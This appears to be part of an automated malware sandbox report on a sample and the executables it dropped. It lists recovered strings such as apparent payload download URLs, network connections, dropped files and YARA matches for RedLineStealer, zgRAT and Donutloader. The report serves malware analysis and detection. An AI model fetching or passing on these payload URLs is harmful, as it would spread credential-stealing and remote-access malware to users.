Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://triedchicken.net/
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://triedchicken.net/:
Source: WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002BFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://triedchicken.net/cad54ba5b01423b1af8ec10ab5719d97.exe
Source: WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002BFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://triedchicken.net/cad54ba5b01423b1af8ec10ab5719d97.exexeK
Source: WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002BFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://triedchicken.net/cad54ba5b01423b1af8ec10ab5719d97.exez
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/
Source: WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/
Source: WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/3
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc5294803_668917518?hash=HcqSqB4BEz69zZduDzHpG5p3oDuUGmC4h5HdrueZTFD&dl=73Wmq1mPc
Source: WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002BFB000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc5294803_669132669?hash=ZKjz6ih7UQ9lzkD21VhcvrQwcwdE4E0ZYGiugVcv47k&dl=WempMPmw6
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2397250157.0000000005E9E000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378223753.0000000005E88000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2378676835.0000000005FEA000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2399977559.0000000006027000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2394268324.0000000006009000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/06
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2397250157.0000000005E9E000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378223753.0000000005E88000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2378676835.0000000005FEA000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2399977559.0000000006027000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2394268324.0000000006009000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: hvkESMr10WtP7_E6btIJmDx0.exe	String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2397504517.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2397504517.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2552343455.0000000005E5C000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2552343455.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2377471770.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2393772444.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2371991780.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378969288.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378488519.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2374464078.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2376962021.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2542152281.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2400872716.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2399082030.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2401550141.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2397504517.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/a
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2397504517.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2552343455.0000000005E5C000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/efox/Y
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2552343455.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2377471770.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2393772444.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2371991780.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378969288.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378488519.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2374464078.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2376962021.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2542152281.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2400872716.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2399082030.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2401550141.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2397504517.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/r
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/refox
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://www.security.us.panasonic.com
Source: ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000002.2733749544.000001C5001C1000.00000004.00000800.00020000.00000000.sdmp, background.js.9.dr	String found in binary or memory: https://www.srvstattis.top/go/a1092825-4fdd-4f87-a9d5-b6b7def0d417?q=
Source: softjenimmp3converter.exe, 0000002E.00000003.2131244589.000000000261A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ssl.com/repository0
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: https://www.thawte.com/repository0W
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000002.2733749544.000001C5001C1000.00000004.00000800.00020000.00000000.sdmp, background.js.9.dr	String found in binary or memory: https://xot.traxa41.net
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zanzibarpivo.com/
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002BFB000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zanzibarpivo.com/7725eaa6592c80f8124e769b4e8a07f7.exe
Source: WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zanzibarpivo.com/7725eaa6592c80f8124e769b4e8a07f7.exexe
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zanzibarpivo.com/z
Source: WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zanzibarpivo.com:80/7725eaa6592c80f8124e769b4e8a07f7.exe
Source: WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zanzibarpivo.com:80/7725eaa6592c80f8124e769b4e8a07f7.exeK

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown	HTTPS traffic detected: 172.67.75.163:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.111:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.144.181:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.119:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.121:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.55.189:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.182:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.130.41.108:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.221.125.202:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 93.186.225.194:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 93.186.225.194:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.0:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.2:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.1:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.32:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.113:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.32:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.32:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.104.85.160:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49900 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49935 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49938 version: TLS 1.2

Drops certificate files (DER)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp704E.tmp			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp703D.tmp			Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 23.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000017.00000002.3121845008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000009.00000002.2945966456.000001C57C0F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000F.00000002.3133986661.0000000003548000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.3128484009.0000000002D47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000E.00000002.3133832345.000000000352A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

PE file contains section with special chars

Source: WlCIinu0yp.exe	Static PE information: section name:
Source: WlCIinu0yp.exe	Static PE information: section name:

PE file has nameless sections

Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
